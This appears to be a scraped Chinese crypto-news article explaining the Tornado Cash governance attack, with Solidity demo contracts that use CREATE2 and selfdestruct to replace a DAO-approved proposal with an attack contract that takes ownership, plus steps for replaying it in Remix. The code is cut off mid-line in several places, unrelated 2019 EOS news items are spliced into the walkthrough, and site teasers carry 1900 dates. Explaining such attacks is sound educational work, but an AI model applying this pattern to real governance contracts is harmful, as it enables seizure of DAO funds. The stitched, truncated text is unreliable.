大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado
address public owner = msg
function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId]; require(proposal
}contract Proposal { event Log(string message); function executeProposal() external { emit Log("Excuted code approved by DAO"); } function emergencyStop() external { selfdestruct(payable(address(0))); }}contract Attack { event Log(string message); address public owner; function executeProposal() external { emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker owner = msg
}contract DeployerDeployer { event Log(address addr); function deploy() external { bytes32 salt = keccak256(abi
}contract Deployer { event Log(address addr); function deployProposal() external { address addr = address(new Proposal()); emit Log(addr); } function deployAttack() external { address addr = address(new Attack()); emit Log(addr); } function kill() external { selfdestruct(payable(address(0))); }}大家可以使用该代码自己在 Remix 中演练一下。
动态 | EOS疑似将推出基于EOS的HandShake DNS解析服务:EOS疑似将推出基于EOS 的 HandShake DNS解析服务,一位开发者的Github显示正在开发EOS-handshake服务。Cosmos社区总监Chjango Unchained4月30日发推表示发现EOS开发者正在复用 Handshake 的开源代码。EOS或许会加入域名解析服务,生态会进一步扩大。(IMEOS)[2019/4/30]
首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用 Deployer.deployProposal() 部署 Proposal 。
拿到 Proposal 提案合约地址后, 向 DAO 发起提案。
分别调用 Deployer.kill 和 Proposal.emergencyStop 销毁掉 Deployer 和 Proposal
再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署 Attack , Attack 将和之前的 Proposal 一致。
动态 | EOSCanada 解析 B1 源代码解释相关期权兑现计划:据 IMEOS 报道,EOSCanada 发布文章解析 B1 源代码,以解释相关期权兑现计划。文中经过源代码分析得出结论,截至2019年1月1日,Block.one 可以赎回共计5879120个代币。分析结果认为,如果 Block.one 想要以小于其全部权重的票数进行投票,则他们必须赎回当前最大数量的代币。然后,他们必须将这些代币转移到一个单独的帐户,抵押,然后投票。截至撰写该文时(2019年3月中旬),这笔金额约为785万美元。因此,虽然 Block.one 以外的任何人都不知道他们投票的想法或他们想要用他们的代币做什么,但我们现在都能理解实际存在的限制。[2019/3/21]
执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。
区块律动BlockBeats
曼昆区块链法律
Foresight News
GWEI Research
吴说区块链
西柚yoga
ETH中文
金色早8点
金色财经 子木
ABCDE
0xAyA
区块链领域的迷人之处,就是总是能出现极小的,开始不被人注意的,不被人看得上的,瞧不起的项目突然变得很大,几个月就成了巨兽,并且发展出无数个跟进的项目、形成了这个方向的生态系统。所以才有无数的人前仆后继.
1900/1/1 0:00:00自 Binance IEO 巅峰之作 Stepn 过去 9 个月后,去年底 Binance 终于重启 IEO。然而恰逢熊市,今年数个 IEO 市场表现不及此前预期,引发社区些许不满.
1900/1/1 0:00:00NFT的快速发展始于2021年,迄今已经经历了多次市场热潮,最近一次则是由Blur驱动并且让社区的目光聚焦到了NFTFi。自2022年开始,加密资产市场进入熊市周期导致NFT市场有所降温.
1900/1/1 0:00:00TL;DR 目前AI + Crypto结合的点主要有2个比较大的方向:分布式算力和ZKML;关于ZKML可以参考我之前的一篇文章。本文将围绕去中心化的分布式算力网络做出分析和反思.
1900/1/1 0:00:00撰写:Ignas 编译:深潮 TechFlowDeFi 世界有什么新事情正在发生?每个月我都会跟随资金来寻找答案。不幸的是,过去两个月是两年来加密货币筹款情况最差的时候,但这 5 个顶级 DeFi 项目却成功地实现了目标.
1900/1/1 0:00:00原文:Javed Khan | celestia blog 编译:GWEI Research 简介 自去年发布以来,OP Stack 在汇总开发人员中获得了巨大的吸引力.
1900/1/1 0:00:00
宇宙链